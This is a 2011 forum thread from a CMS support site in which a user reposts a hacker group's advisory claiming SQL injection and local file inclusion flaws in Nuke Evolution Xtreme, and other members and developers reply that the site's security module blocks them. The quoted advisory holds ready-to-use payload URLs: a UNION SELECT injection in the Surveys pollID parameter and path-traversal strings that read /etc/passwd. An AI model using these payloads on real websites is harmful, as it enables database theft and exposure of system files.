Anonymous,

Please Login or Register
Download Nuke Evolution Xtreme today for a CMS you can enjoy using and sharing with your friends!
[ Download Now ]
Forum Index  ·  Search  ·  Usergroups  ·  Edit your profile  ·  Members  ·  Login, Check Messages
Arcade  ·  Ranks  ·  Staff  ·  Statistics  ·  Board Rules  ·  Forum FAQ  ·  Log in

Search for at
Evolution-Xtreme Advanced Search


+  
Latest Site News   Next 5 >>  
 Forum   Author   Replies   Last Post 
File Repository 1.0.0 Released Announcements! Lonestar 0 Tue Apr 26, 2016 6:44 am
Lonestar View latest post
Image Repository Released Announcements! Lonestar 1 Mon Oct 27, 2014 7:39 pm
Lonestar View latest post
So what happened to us? Announcements! SgtLegend 0 Tue May 06, 2014 12:32 am
SgtLegend View latest post
[PROGRESS] Nuke Evolution Xtreme 2.0.9e Announcements! SgtLegend 2 Sun May 27, 2012 6:25 pm
SgtLegend View latest post
European Cookie Law Announcements! SgtLegend 0 Sat May 26, 2012 7:33 am
SgtLegend View latest post
   
Recent Topics   Next 15 >>  
 Forum   Author   Replies   Last Post 
Evo staff looking for some volunteers. Community Announcements coRpSE 20 Thu Jul 02, 2015 9:19 am
Depresjon2 View latest post
Evo Xtreme 2.0.9D Updated for PHP 5.6 General Support coRpSE 121 Thu Mar 23, 2017 3:57 pm
casterdon View latest post
[ MOD ] - Honeypot V2.2 AntiBot Module Security coRpSE 106 Tue Nov 22, 2016 11:30 am
coRpSE View latest post
Possible new Admin area layout Comments and Suggestions Lonestar 18 Wed Sep 14, 2016 11:37 am
Blackou View latest post
jQuery update General Support Lonestar 2 Wed May 11, 2016 4:49 pm
Charles64 View latest post
Deutsche Sprachdatei - german language files German DT50R 7 Thu Jan 28, 2016 7:04 am
DT50R View latest post
[FIX] Correct Cookie Settings (Invalid Session Error) Quick fixes killigan 110 Fri Mar 20, 2015 1:06 pm
Macdaddy View latest post
head and body help General Support hercountrybuck 8 Tue Apr 04, 2017 2:08 pm
Sp0rAdiC View latest post
babstats nuke evo PHP 5.6 Modules pd35 4 Mon Mar 27, 2017 5:45 pm
Ragonese View latest post
Looking for coRpSE? He is gone till May. General Chat coRpSE 4 Sun Mar 26, 2017 6:50 pm
coRpSE View latest post
Think I got hit with malware somehow General Support bobdude 10 Sun Mar 26, 2017 6:44 pm
coRpSE View latest post
error log Bugs Redcougarxr7 31 Tue Mar 21, 2017 8:46 pm
coRpSE View latest post
I seem to be locked out of my website Smile General Support storm 4 Sat Mar 11, 2017 12:29 pm
coRpSE View latest post
Site gone off General Support GI_ 3 Fri Mar 03, 2017 11:21 am
Lonestar View latest post
Norwegian Language Multilingual Support dogbone 0 Wed Mar 01, 2017 10:43 pm
dogbone View latest post

Does anyone know about this exploit ? Should we be careful

 
Post new topic    Reply to topic    printer-friendly view   Thank Post    Evolution-Xtreme Forum Index -> Security
View previous topic :: View next topic  
Author Message
Redcougarxr7



Gender: Gender:Male
Joined: Jan 04, 2011
Age: 48
Posts: 53

Reputation: 6.6
usa.png


Status: Offline
PostPosted: Mon May 09, 2011 12:09 pm Post subject: No icon Does anyone know about this exploit ? Should we be careful Reply with quote

 I  found  this  while  on  the  internet  today  just  reading  around.
 
 
 
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0        _                             __                 __           __                                1
 1     /'                    __   /'__`            /  \__   /'__`                             0
 0   /\_,        ___     /\_/\_         ___   ,_/  /     _  ___                 1
 1   /_/   /'  _  `  /  /_/_\_<_   /'___   /      /`'__               0
 0           /  /      /     /  \__/   \_   \_     /                 1
 1           \_  \_  \_\_     \____/  \____\  \__\  \____/  \_                 0
 0           /_//_//_/  \_  /___/   /____/  /__/  /___/   /_/                 1
 1                             \____/  >>  Exploit  database  separated  by  exploit     0
 0                             /___/               type  (local,  remote,  DoS,  etc.)      1
 1                                                                                                         1
 0   [+]  Site                  :  1337day.com                                                     0
 1   [+]  Support  e-mail   :  submit[at]1337day.com                                      1
 0                                                                                                         0
 1                       #########################################                     1
 0                       I'm  KedAns-Dz  member  from  Inj3ct0r  Team                        1
 1                       #########################################                     0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
 ###
 #  Title  :  Nuke_Evolution_Xtreme  <=  2.0  (SQLi/LFI)  Vulnerabilities
 #  Author  :  KedAns-Dz
 #  E-mail  :
Please  login  to  see  this  email
Get  registered  or  Log  in
 |
Please  login  to  see  this  email
Get  registered  or  Log  in

 #  Home  :  HMD/AM  (30008/04300)  -  Algeria  -(00213555248701)
 #  Twitter  page  :  twitter.com/kedans
 #  platform  :  php
 #  Impact  :  (SQL  Inj3cTi0n  +  LoCal  File  InClusi0n  )  Vulnerabilities
 #  Tested  on  :  Windows  XP  sp3  FR  &  Linux.(Ubuntu  10.10)  En
 ###
 #  [»]  ~  special  thanks  to  :  Caddy-Dz  +  All  Inj3cT0r  Team  +  Exploit-id  Team
 ###
 
 #  Exploit  :
 
 #========  SQL  Inj3cTi0n  ====>
 
 (*)  Info  CMS  &  Vulne  :
 ---------------------
 (!)  This  Vulnerability  is  Impacting  as  (Survey/poll)  modules  in  PHPNuke  8.0
 And  (Nuke_Evolution_Xtreme  v  2.0)  is  CMS  Based  at  PHPNuke  Modules  ,
 So  The  SQL  Injection  Vulnerability  is  Existing  ....
 
 >  Demo  PoC  :  http://[LocalHost]/[Path]/modules.php?name=Surveys&op=results&pollID=[!  SQL  Inj3cTi0n  HeRe  !]
 >  Ex  :  http://[localhost]/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
 
 #========  LoCal  File  InClusi0n  ===>
 
 >  Demo  :  http://[localhost]/[path]/modules.php?name=[+MoDule_NamE+]&file=[!  LFI  !]%00
 >  Ex:
 http://[localhost]/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00
 http://[localhost]/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00
 
 #================[  Exploited  By  KedAns-Dz  *  HST-Dz  *  ]===========================================
 #  Greets  To  :  [D]  HaCkerS-StreeT-Team  [Z]  <  Algerians  HaCkerS  >
 #  +  Greets  To  Inj3ct0r  Operators  Team  :  r0073r  *  Sid3^effectS  *  r4dc0re  (www.1337day.com)
 #  Inj3ct0r  Members  31337  :  Indoushka  *  KnocKout  *  eXeSoul  *  eidelweiss  *  SeeMe  *  XroGuE  *  agix  *
 #  gunslinger_  *  Sn!pEr.S!Te  *  ZoRLu  *  anT!-Tr0J4n  'www.1337day.com/team'  ++  ....
 #  Exploit-Id  Team  :  jos_ali_joe  +  kaMtiEz  (exploit-id.com)  ...  All  Others  *  TreX  (hotturks.org)
 #  JaGo-Dz  (sec4ever.com)  *  KelvinX  (kelvinx.net)  *  PaCketStorm  Team  (www.packetstormsecurity.org)
 #  www.metasploit.com  *  www.securityreason.com  *  All  Security  and  Exploits  Webs  ...
 #================================================================================================
Back to top
View user's profile Send private message Visit poster's website
VicToMeyeZR
DFG Developer
DFG Developer




Joined: Oct 09, 2008
Posts: 322
Location: Texas
Reputation: 13


Status: Offline
Web Control Panel: cPanel
PostPosted: Mon May 09, 2011 2:38 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

 And  did  you  try  it?
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
TimBitz




Joined: May 13, 2009
Posts: 122

Reputation: 15.3
canada.png


Status: Offline
PostPosted: Mon May 09, 2011 2:47 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

 You  know,  I  tried  something  like  that  once,  just  to  see  what  would  happen.   NukeSentinel  banned  me  from  my  own  website  in  about  0.13s  lol   Laughing
Back to top
View user's profile Send private message Visit poster's website
Sponsor
phpstorm.jpg
Redcougarxr7



Gender: Gender:Male
Joined: Jan 04, 2011
Age: 48
Posts: 53

Reputation: 6.6
usa.png


Status: Offline
PostPosted: Mon May 09, 2011 2:57 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

 No  I  havent  tried  it.  Just  wanted  to  post  what  I  found  just  in  case  noone  knew.
Back to top
View user's profile Send private message Visit poster's website
SnakZ
Xtreme Contributor
Xtreme Contributor



Gender: Gender:Male
Joined: Jul 14, 2010
Age: 31
Posts: 735
Location: MD
Reputation: 70.9
votes: 4
usa.png


Status: Offline
Web Control Panel: xampp 1.7.4
PostPosted: Mon May 09, 2011 3:10 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

 one  that  said  php-nuke  evo  2.0  this  is  php-nuke  evo  2.7  with  xtreme  on  top  of  that
 
 ANY  way  i  did  try  them  and  only  thing  that  came  up  was  "Your  so  cool"
 what  mean  that  the  CMS  knew  what  was  going  on  and  block  the  hack  
 
 so  the  end  we  are  SAFE  yet  again  Very Happy
Back to top
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger Visit member's Facebook: 720050661 MySpace Profile: zzsnakzz
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Mon May 09, 2011 4:25 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

 I  was  worried  there  for  a  moment!
Back to top
View user's profile Send private message Visit poster's website
Sponsor
phpstorm.jpg
SgtLegend
Site Admin
Site Admin
Lead Developer
Lead Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 11, 2008
Age: 25
Posts: 5169
Location: Australia
Reputation: 616.1
votes: 27
australia.png


Status: Offline
Web Control Panel: WHM
PostPosted: Mon May 09, 2011 6:30 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

 The  overall  core  of  Nuke  Sentinel  and  Nuke  itself  were  updated  quite  a  lot  compared  to  the  core  that  PHP-Nuke  8  uses  so  hacks  like  this  just  get  ignored.
 
 On  a  side  note  its  sad  that  people  just  don't  get  real  lives  instead  of  hacking  people  since  in  my  head  99%  of  all  hackers  are  fat  slobs  who  sit  on  a  chair  all  day.
Back to top
View user's profile Send private message Visit poster's website
Ruphus



Gender: Gender:Male
Joined: Jan 24, 2010
Posts: 315
Location: Houston.Tx.
Reputation: 31.4
usa.png


Status: Offline
PostPosted: Fri Jan 06, 2012 8:28 am Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

                                                   
TimBitz  wrote  (View  Post):                
You  know,  I  tried  something  like  that  once,  just  to  see  what  would  happen.   NukeSentinel  banned  me  from  my  own  website  in  about  0.13s  lol   Laughing                

 
 LAFF!
Back to top
View user's profile Send private message Visit poster's website Yahoo Messenger MSN Messenger Visit member's Facebook: http://www.facevook.com/MoviezOnly
w2ibc




Joined: Oct 31, 2009
Posts: 22

Reputation: 15.8
votes: 1
usa.png


Status: Offline
PostPosted: Fri Jan 06, 2012 3:50 pm Post subject: No icon Re: Does anyone know about this exploit ? Should we be care Reply with quote

                                                   
SgtLegend  wrote  (View  Post):                
The  overall  core  of  Nuke  Sentinel  and  Nuke  itself  were  updated  quite  a  lot  compared  to  the  core  that  PHP-Nuke  8  uses  so  hacks  like  this  just  get  ignored.
 
 On  a  side  note  its  sad  that  people  just  don't  get  real  lives  instead  of  hacking  people  since  in  my  head  99%  of  all  hackers  are  fat  slobs  who  sit  on  a  chair  all  day.                

 
 I  call  them  script  kiddy  crackers.
 
 A  true  hacker  has  better  things  to  do  then  "hack"  nuke  sites.
Back to top
View user's profile Send private message Visit poster's website
Sponsor
webstorm.jpg
Display posts from previous:
Post new topic  Reply to topic   printer-friendly view   Thank Post Evolution-Xtreme Forum Index ->  Security All times are UTC - 5 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum

Related topics
 Topics   Replies   Author   Views   Last Post 
This topic is locked: you cannot edit posts or make replies. Announcement: [BETA][RELEASED] Nuke Evolution 2.0.8 0 SgtLegend 3791 Fri May 28, 2010 4:54 am
SgtLegend View latest post
No new posts Dutch Language for Xtreme V2.0 4 DFC-NightMare[NL] 3956 Wed May 01, 2013 1:18 pm
coRpSE View latest post
No new posts [Solved] Birhday mod 3.0 missing: 18 Huntergreen 11897 Mon Mar 04, 2013 7:54 pm
Teo View latest post
No new posts help upgrading to evo xtream 2.0.7 1 kirky12 3787 Thu Sep 02, 2010 10:06 am
SgtLegend View latest post
This topic is locked: you cannot edit posts or make replies. [ Poll ] Xtreme v2.0 52 Lonestar 20805 Wed Oct 14, 2009 2:51 am
SgtLegend View latest post
 




Powered by phpBB © 2001, 2006 phpBB Group
EvoXtreme Theme by SgtLegend ©
Forums ©